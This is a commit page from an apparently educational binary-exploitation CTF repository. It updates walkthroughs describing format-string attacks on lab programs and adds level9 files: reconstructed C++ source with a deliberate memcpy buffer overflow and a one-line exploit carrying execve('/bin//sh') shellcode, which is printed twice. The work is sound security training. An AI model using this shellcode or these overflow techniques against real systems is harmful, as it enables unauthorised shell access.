fix: bunch of meaningless chars in the walkthrough/source code

level9: done (wip - walkthrough)
2025-05-05 18:00:54 +02:00 · 2025-05-05 18:00:54 +02:00 · 428102a376
commit 428102a376
parent 50afa069df
5 changed files with 49 additions and 4 deletions
--- a/level3/walkthrough
+++ b/level3/walkthrough
@ -1,7 +1,7 @@
 # Level3

-Using ghidra, we can decompile the code and see that it fills a buffer of 520 bytes using `fgets`.
-This buffer will then be passed directly as a parameter to `printf`. This allows us to print whatever we want (e.g dump the stack, change variables).
+Using ghidra, we can decompile the code and see that it fills a buffer of 520 bytes using `fgets()`.
+This buffer will then be passed directly as a parameter to `printf()`. This allows us to print whatever we want (e.g dump the stack, change variables).
 We can see in the decompiled code that a global variable `m` exists. The program will execute a `system("/bin/sh")` if `m == 64`.
 Our goal here will be to change the value of this variable in order to get the password.

--- a/level4/walkthrough
+++ b/level4/walkthrough
@ -1,6 +1,6 @@
 # Level4

-Using ghidra, we can decompile the code and see that it fills a buffer of 520 bytes using `fgets`.
+Using ghidra, we can decompile the code and see that it fills a buffer of 520 bytes using `fgets()`.
 This buffer will then be passed directly as a parameter to `printf`. This allows us to print whatever we want (e.g dump the stack, change variables).
 We can see in the decompiled code that a global variable `m` exists. The program will execute a `system("/bin/cat /home/user/level5/.pass")` if `m == 16930116`.
 Our goal here will be to change the value of this variable in order to get the password.
--- a/level7/source.c
+++ b/level7/source.c
@ -9,7 +9,7 @@ void m(void)
 {
 	time_t current_time;

-	current_time = time((time_t *)0x0);
+	current_time = time(NULL);
 	printf("%s - %d\n", c, current_time);
 	return;
 }
--- a/level9/ressources/exploit
+++ b/level9/ressources/exploit
@ -0,0 +1 @@
+./level9 $(python -c 'print "\x11\xa0\x04\x08" + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "A"*79 + "\x0c\xa0\x04\x08"')
--- a/level9/source.cpp
+++ b/level9/source.cpp
@ -0,0 +1,44 @@
+#include <cstring>
+#include <stdlib.h>
+
+class N
+{
+      public:
+	char annotation[100];
+	int nb;
+
+	N(int Nb)
+	{
+		nb = Nb;
+	}
+
+	void setAnnotation(char *str)
+	{
+		memcpy(annotation, str, strlen(str));
+	}
+
+	int operator+(N const &e)
+	{
+		return nb + e.nb;
+	}
+
+	int operator-(N const &e)
+	{
+		return nb - e.nb;
+	}
+};
+
+int main(int ac, char **av)
+{
+	if (ac <= 1)
+		exit(1);
+
+	N *a = new N(5);
+	N *b = new N(6);
+
+	N *a_ptr = a;
+	N *b_ptr = b;
+	a_ptr->setAnnotation(av[1]);
+
+	return *b_ptr + *a_ptr;
+}
				`@ -0,0 +1 @@`
				`./level9 $(python -c 'print "\x11\xa0\x04\x08" + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "A"*79 + "\x0c\xa0\x04\x08"')`